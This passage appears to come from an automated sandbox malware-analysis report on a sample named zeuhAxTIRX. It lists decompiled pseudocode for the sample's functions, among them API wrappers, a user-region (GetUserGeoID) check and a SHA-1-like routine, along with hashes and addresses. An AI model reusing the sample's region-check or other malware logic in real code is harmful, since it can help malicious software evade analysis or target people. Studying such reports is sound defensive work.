					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E00E5C603(1, 8, _t19 + 0x884) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                                                                0x00e598b3
                                                                                                                0x00e598c4
                                                                                                                0x00e598c8
                                                                                                                0x00e598d3
                                                                                                                0x00e598d8
                                                                                                                0x00e598e3
                                                                                                                0x00e598fb
                                                                                                                0x00e59900
                                                                                                                0x00e59907
                                                                                                                0x00e59909
                                                                                                                0x00e59916
                                                                                                                0x00e5991a
                                                                                                                0x00000000
                                                                                                                0x00e5993e
                                                                                                                0x00e5991a
                                                                                                                0x00e59946

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0000FF46,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E59916
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 4ca72a9b95d35e80b9f0b5d5fb098524bd240e277037fc7deee9f49694031f50
                                                                                                                • Instruction ID: da46060ccc7bb0754c171214d44dd379fe3b6fa3558f68c72f4ddb77c622f361
                                                                                                                • Opcode Fuzzy Hash: 4ca72a9b95d35e80b9f0b5d5fb098524bd240e277037fc7deee9f49694031f50
                                                                                                                • Instruction Fuzzy Hash: EF019B71A4031476E721A6959C43FEE779C9B40B51F145518FF047A1C1D794AA0A43E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E8B3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 154 e6e8b3-e6e8e4 call e6f213 RtlFreeHeap
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E8B3(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                0x00e6e8c2
                                                                                                                0x00e6e8ca
                                                                                                                0x00e6e8e0
                                                                                                                0x00e6e8e4

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,6398FDE0,00000000,?), ref: 00E6E8E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                • Instruction ID: f63117f1bf2c928fbceb0381b9517cbdce30462debe3cb2c29b60d2ddd22d863
                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                • Instruction Fuzzy Hash: B1E04FB56402046FCB14DF89EC49EA737ADEF88750F014054FE0957251C630F910CAF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E600B3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 146 e600b3-e600d7 call e69613 149 e600db-e600ec GetUserGeoID 146->149 150 e600d9-e600da 146->150
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00E600B3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00E69613(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                                                0x00e600cd
                                                                                                                0x00e600d7
                                                                                                                0x00e600dd
                                                                                                                0x00e600ec
                                                                                                                0x00e600da
                                                                                                                0x00e600da
                                                                                                                0x00e600da

                                                                                                                APIs
                                                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 00E600DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: User
                                                                                                                • String ID:
                                                                                                                • API String ID: 765557111-0
                                                                                                                • Opcode ID: 959825926c59bb5670012e2e2a6cedfad3f46c8924c70514a6daeba164646bbb
                                                                                                                • Instruction ID: d9f560e849790a3954dbf9a4be0563975f6e30856f29757fc9b5b1bc3c6a7087
                                                                                                                • Opcode Fuzzy Hash: 959825926c59bb5670012e2e2a6cedfad3f46c8924c70514a6daeba164646bbb
                                                                                                                • Instruction Fuzzy Hash: A4E02B737C030467F730D1E99C46FBA328E5B84B40F048470F90CF72C2D4A4E4800020
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E873 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 151 e6e873-e6e8a4 call e6f213 RtlAllocateHeap
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E873(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                0x00e6e882
                                                                                                                0x00e6e88a
                                                                                                                0x00e6e8a0
                                                                                                                0x00e6e8a4

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00E68CC9,?,00E69470,00E69470,?,00E68CC9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 00E6E8A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                • Instruction ID: 30fdbada59b1774b06f3b457e5845dfc668543e9d9ea3656f739ec2434bf0e0a
                                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                • Instruction Fuzzy Hash: FDE04FB56402046BC714DF89EC45E9737ADEF88754F018054FE085B241C630F910CAF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6EA13 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 157 e6ea13-e6ea47 call e6f213 LookupPrivilegeValueW
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6EA13(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E00E6F213( *((intOrPtr*)(_a4 + 0x160)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x160)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                0x00e6ea2d
                                                                                                                0x00e6ea43
                                                                                                                0x00e6ea47

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E5FF05,00E5FF05,?,00000000,?,?), ref: 00E6EA43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: fcd9c8699ba7664216ee9c99a80c6681bfd3f6b1868cf2e6b0f001b81709f581
                                                                                                                • Instruction ID: 2dcdedfc9bba2548b80a69846cce51369b7387065da5be5b9dc9ff4c8697708c
                                                                                                                • Opcode Fuzzy Hash: fcd9c8699ba7664216ee9c99a80c6681bfd3f6b1868cf2e6b0f001b81709f581
                                                                                                                • Instruction Fuzzy Hash: 73E01AB56402086BC720DF89DC45EE737ADAF88754F014064FA0857242C631E8108AB5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E8F3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 163 e6e8f3-e6e91f call e6f213 ExitProcess
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E8F3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E00E6F213( *((intOrPtr*)(_a4 + 0x548)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x548)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                0x00e6e8f6
                                                                                                                0x00e6e90d
                                                                                                                0x00e6e91b

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00E6E91B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: b0862e506422028649449cc44b996d51ecce70c2b7044397943b465b2a281be3
                                                                                                                • Instruction ID: 86b49606d5d05857fe86a39226fb68d90594c7f051da5426307225a754f33d57
                                                                                                                • Opcode Fuzzy Hash: b0862e506422028649449cc44b996d51ecce70c2b7044397943b465b2a281be3
                                                                                                                • Instruction Fuzzy Hash: 47D012756402147BC620DB98DC45FD7779CDF45694F014065BA4C5B241C670BA40CBE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00E5BF9D Relevance: 1.7, Strings: 1, Instructions: 435COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E00E5BF9D(void* __eax, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t287;
				void* _t366;
				void* _t462;
				void* _t496;

				_t496 = __esi;
				_t462 = __edi;
				asm("cld");
				_pop(es);
				_t287 = __ecx;
				_t366 = __eax;
				asm("in eax, 0x45");
				if (__eflags > 0) goto L4;
			}







                                                                                                                0x00e5bf9d
                                                                                                                0x00e5bf9d
                                                                                                                0x00e5bf9d
                                                                                                                0x00e5bf9e
                                                                                                                0x00e5bf9f
                                                                                                                0x00e5bf9f
                                                                                                                0x00e5bfa0
                                                                                                                0x00e5bfa2

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                • Opcode ID: 06493ec4869f494f9ff954de57896c640c2094d9658dd0e21ad1715e90835b73
                                                                                                                • Instruction ID: d4934299c23b6680be21057f0fd417368755cfa9c487c71e140718cad05808fe
                                                                                                                • Opcode Fuzzy Hash: 06493ec4869f494f9ff954de57896c640c2094d9658dd0e21ad1715e90835b73
                                                                                                                • Instruction Fuzzy Hash: B7120DB6E006199FDB14CF99D88059DFBF2FF88314F1AC1AAD849A7315D774AA418F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E5BFDE Relevance: 1.7, Strings: 1, Instructions: 424COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00E5BFDE(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed int* _t278;
				signed int* _t279;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				signed int _t293;
				signed int _t296;
				signed int _t300;
				signed int _t304;
				signed int _t306;
				signed int _t312;
				signed int _t320;
				signed int _t322;
				signed int _t325;
				signed int _t327;
				signed int _t336;
				signed int _t342;
				signed int _t343;
				signed int _t348;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t365;
				signed int _t368;
				signed int _t372;
				signed int _t373;
				signed int _t403;
				signed int _t408;
				signed int _t414;
				signed int _t417;
				signed int _t424;
				signed int _t427;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t449;
				signed int _t451;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t473;
				signed int _t481;
				signed int _t482;
				signed int* _t483;
				signed int* _t486;
				signed int _t493;
				signed int _t496;
				signed int _t501;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				signed int _t511;
				signed int _t515;
				signed int _t527;
				signed int _t530;
				signed int _t537;
				void* _t543;
				void* _t545;

				asm("outsd");
				_t543 = _t545;
				_t486 = _a4;
				_push(_t451);
				_t356 = 0;
				_t2 =  &(_t486[7]); // 0x45
				_t278 = _t2;
				do {
					_push(_t278);
					 *_t451 =  *_t451 - 1;
					 *(_t543 + _t356 * 4 - 0x14c) = ((0x00000038 << 0x00000008 | _t451) << 0x00000008 | _t278[0] & 0x000000ff) << 0x00000008 | _t278[0] & 0x000000ff;
					 *(_t543 + _t356 * 4 - 0x148) = (((_t278[0] & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff;
					 *(_t543 + _t356 * 4 - 0x144) = (((_t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
					_t451 = _t278[3] & 0x000000ff;
					 *(_t543 + _t356 * 4 - 0x140) = (((_t278[2] & 0x000000ff) << 0x00000008 | _t278[3] & 0x000000ff) << 0x00000008 | _t278[3] & 0x000000ff) << 0x00000008 | _t451;
					_t356 = _t356 + 4;
					_t278 =  &(_t278[4]);
				} while (_t356 < 0x10);
				_t279 =  &_v304;
				_v8 = 0x10;
				do {
					_t403 =  *(_t279 - 0x18);
					_t462 =  *(_t279 - 0x14);
					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t403;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t462;
					_t279[8] = _t360;
					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
					_t279 =  &(_t279[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t279[6] = _t320 ^ _t403;
					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t462;
				} while ( *_t46 != 0);
				_t322 =  *_t486;
				_t280 = _t486[1];
				_t361 = _t486[2];
				_t408 = _t486[3];
				_v12 = _t322;
				_v16 = _t486[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t465 = _v8;
					_t493 = _t322 + ( !_t280 & _t408 | _t361 & _t280) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t325 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t408;
					_v12 = _t493;
					asm("rol esi, 0x5");
					_v8 = _t361;
					_t414 = _t493 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t496 = _t280;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t365 = _v12;
					_v8 = _t325;
					_t327 = _v8;
					_v12 = _t414;
					asm("rol edx, 0x5");
					_t286 = _t414 + ( !_t365 & _t496 | _t325 & _t365) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t417 = _v12;
					_v16 = _t496;
					asm("ror ecx, 0x2");
					_v8 = _t365;
					_v12 = _t286;
					asm("rol eax, 0x5");
					_v16 = _t327;
					_t501 = _t286 + ( !_t417 & _t327 | _t365 & _t417) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t361 = _v12;
					_t289 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t417;
					_v12 = _t501;
					asm("rol esi, 0x5");
					_v16 = _t289;
					_t280 = _v12;
					_t504 = _t501 + ( !_t361 & _t289 | _t417 & _t361) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t408 = _v8;
					asm("ror ecx, 0x2");
					_t466 = _t465 + 5;
					_t322 = _t504;
					_v12 = _t322;
					_v8 = _t466;
				} while (_t466 < 0x14);
				_t467 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t408;
					_t507 = _t504 + (_t408 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t336 = _v12;
					_v12 = _t507;
					asm("rol esi, 0x5");
					_t424 = _t507 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t510 = _t280;
					_v16 = _t361;
					_t368 = _v12;
					_v12 = _t424;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t293 = _t424 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t427 = _v12;
					_v8 = _t336;
					_v8 = _t368;
					_v12 = _t293;
					asm("rol eax, 0x5");
					_t467 = _t467 + 5;
					_t361 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t510 + 0x6ed9eba1; // 0x6ed9ebc9
					_t511 = _t293 + (_t336 ^ _v8 ^ _t427) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x154)) + _t146;
					_t296 = _v8;
					_v8 = _t427;
					_v12 = _t511;
					asm("rol esi, 0x5");
					_t408 = _v8;
					_t504 = _t511 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
					_v16 = _t296;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t504;
				} while (_t467 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t408;
					asm("ror eax, 0x2");
					_t515 = ((_t361 | _t280) & _t408 | _t361 & _t280) +  *((intOrPtr*)(_t543 + _v8 * 4 - 0x14c)) + _t504 + _v16 - 0x70e44324;
					_t473 = _v12;
					_v12 = _t515;
					asm("rol esi, 0x5");
					_t342 = _v8;
					asm("ror edi, 0x2");
					_t436 = ((_t280 | _t473) & _t361 | _t280 & _t473) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x148)) + _t515 + _v16 - 0x70e44324;
					_v16 = _t361;
					_t372 = _v12;
					_v12 = _t436;
					asm("rol edx, 0x5");
					_v8 = _t280;
					_t438 = ((_t473 | _t372) & _t280 | _t473 & _t372) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x144)) + _t436 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t300 = _v12;
					_v8 = _t473;
					_v12 = _t438;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t527 = ((_t372 | _t300) & _t473 | _t372 & _t300) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x140)) + _t438 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t441 = _t372;
					_t361 = _v12;
					_v8 = _t441;
					_v12 = _t527;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t504 = ((_t300 | _t361) & _t441 | _t300 & _t361) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x13c)) + _t527 + _v16 - 0x70e44324;
					_t408 = _t300;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t504;
					_t343 = _t342 + 5;
					_v8 = _t343;
				} while (_t343 < 0x3c);
				_t481 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t482 = _v8;
					asm("ror eax, 0x2");
					_t530 = (_t408 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t543 + _t481 * 4 - 0x14c)) + _t504 + _v16 - 0x359d3e2a;
					_t348 = _v12;
					_v16 = _t408;
					_v12 = _t530;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t449 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x148)) + _t530 + _v16 - 0x359d3e2a;
					_v16 = _t361;
					_t373 = _v12;
					_v12 = _t449;
					asm("rol edx, 0x5");
					_v16 = _t280;
					asm("ror ecx, 0x2");
					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x144)) + _t449 + _v16 - 0x359d3e2a;
					_t408 = _v12;
					_v12 = _t304;
					asm("rol eax, 0x5");
					_v16 = _t348;
					_t537 = (_t348 ^ _t373 ^ _t408) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
					_t306 = _t373;
					_v8 = _t348;
					asm("ror edx, 0x2");
					_v8 = _t373;
					_t361 = _v12;
					_v12 = _t537;
					asm("rol esi, 0x5");
					_t481 = _t482 + 5;
					_t504 = (_t306 ^ _t408 ^ _t361) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x13c)) + _t537 + _v16 - 0x359d3e2a;
					_v16 = _t306;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t408;
					_v12 = _t504;
					_v8 = _t481;
				} while (_t481 < 0x50);
				_t483 = _a4;
				_t483[2] = _t483[2] + _t361;
				_t483[3] = _t483[3] + _t408;
				_t312 = _t483[4] + _v16;
				 *_t483 =  *_t483 + _t504;
				_t483[1] = _t483[1] + _t280;
				_t483[4] = _t312;
				_t483[0x17] = 0;
				return _t312;
			}


































































                                                                                                                0x00e5bfde
                                                                                                                0x00e5bfe4
                                                                                                                0x00e5bfee
                                                                                                                0x00e5bff1
                                                                                                                0x00e5bff2
                                                                                                                0x00e5bff4
                                                                                                                0x00e5bff4
                                                                                                                0x00e5bff7
                                                                                                                0x00e5bff9
                                                                                                                0x00e5bffa
                                                                                                                0x00e5c019
                                                                                                                0x00e5c03f
                                                                                                                0x00e5c065
                                                                                                                0x00e5c07e
                                                                                                                0x00e5c087
                                                                                                                0x00e5c08e
                                                                                                                0x00e5c091
                                                                                                                0x00e5c094
                                                                                                                0x00e5c09d
                                                                                                                0x00e5c0a3
                                                                                                                0x00e5c0aa
                                                                                                                0x00e5c0bb
                                                                                                                0x00e5c0be
                                                                                                                0x00e5c0c1
                                                                                                                0x00e5c0c5
                                                                                                                0x00e5c0c7
                                                                                                                0x00e5c0c9
                                                                                                                0x00e5c0d2
                                                                                                                0x00e5c0d5
                                                                                                                0x00e5c0d8
                                                                                                                0x00e5c0e3
                                                                                                                0x00e5c0e9
                                                                                                                0x00e5c0eb
                                                                                                                0x00e5c0eb
                                                                                                                0x00e5c0ee
                                                                                                                0x00e5c0f1
                                                                                                                0x00e5c0f1
                                                                                                                0x00e5c0f6
                                                                                                                0x00e5c0f8
                                                                                                                0x00e5c0fb
                                                                                                                0x00e5c0fe
                                                                                                                0x00e5c104
                                                                                                                0x00e5c107
                                                                                                                0x00e5c10a
                                                                                                                0x00e5c113
                                                                                                                0x00e5c119
                                                                                                                0x00e5c122
                                                                                                                0x00e5c131
                                                                                                                0x00e5c138
                                                                                                                0x00e5c13b
                                                                                                                0x00e5c13e
                                                                                                                0x00e5c147
                                                                                                                0x00e5c14a
                                                                                                                0x00e5c14d
                                                                                                                0x00e5c165
                                                                                                                0x00e5c16c
                                                                                                                0x00e5c16e
                                                                                                                0x00e5c171
                                                                                                                0x00e5c174
                                                                                                                0x00e5c17d
                                                                                                                0x00e5c184
                                                                                                                0x00e5c187
                                                                                                                0x00e5c18a
                                                                                                                0x00e5c199
                                                                                                                0x00e5c1a0
                                                                                                                0x00e5c1a3
                                                                                                                0x00e5c1a6
                                                                                                                0x00e5c1af
                                                                                                                0x00e5c1b9
                                                                                                                0x00e5c1bc
                                                                                                                0x00e5c1c8
                                                                                                                0x00e5c1cb
                                                                                                                0x00e5c1d2
                                                                                                                0x00e5c1d5
                                                                                                                0x00e5c1d8
                                                                                                                0x00e5c1dd
                                                                                                                0x00e5c1e0
                                                                                                                0x00e5c1e9
                                                                                                                0x00e5c1fa
                                                                                                                0x00e5c1fd
                                                                                                                0x00e5c200
                                                                                                                0x00e5c207
                                                                                                                0x00e5c20a
                                                                                                                0x00e5c20d
                                                                                                                0x00e5c210
                                                                                                                0x00e5c212
                                                                                                                0x00e5c215
                                                                                                                0x00e5c218
                                                                                                                0x00e5c221
                                                                                                                0x00e5c226
                                                                                                                0x00e5c226
                                                                                                                0x00e5c23b
                                                                                                                0x00e5c23e
                                                                                                                0x00e5c241
                                                                                                                0x00e5c248
                                                                                                                0x00e5c24b
                                                                                                                0x00e5c24e
                                                                                                                0x00e5c263
                                                                                                                0x00e5c26a
                                                                                                                0x00e5c26d
                                                                                                                0x00e5c271
                                                                                                                0x00e5c274
                                                                                                                0x00e5c279
                                                                                                                0x00e5c27c
                                                                                                                0x00e5c28b
                                                                                                                0x00e5c28e
                                                                                                                0x00e5c295
                                                                                                                0x00e5c298
                                                                                                                0x00e5c29b
                                                                                                                0x00e5c29e
                                                                                                                0x00e5c2a1
                                                                                                                0x00e5c2a9
                                                                                                                0x00e5c2b7
                                                                                                                0x00e5c2ba
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2c4
                                                                                                                0x00e5c2c7
                                                                                                                0x00e5c2ca
                                                                                                                0x00e5c2d2
                                                                                                                0x00e5c2e0
                                                                                                                0x00e5c2e3
                                                                                                                0x00e5c2ea
                                                                                                                0x00e5c2ed
                                                                                                                0x00e5c2f0
                                                                                                                0x00e5c2f3
                                                                                                                0x00e5c2f6
                                                                                                                0x00e5c2ff
                                                                                                                0x00e5c306
                                                                                                                0x00e5c306
                                                                                                                0x00e5c30c
                                                                                                                0x00e5c325
                                                                                                                0x00e5c328
                                                                                                                0x00e5c32f
                                                                                                                0x00e5c332
                                                                                                                0x00e5c335
                                                                                                                0x00e5c347
                                                                                                                0x00e5c351
                                                                                                                0x00e5c354
                                                                                                                0x00e5c35d
                                                                                                                0x00e5c360
                                                                                                                0x00e5c367
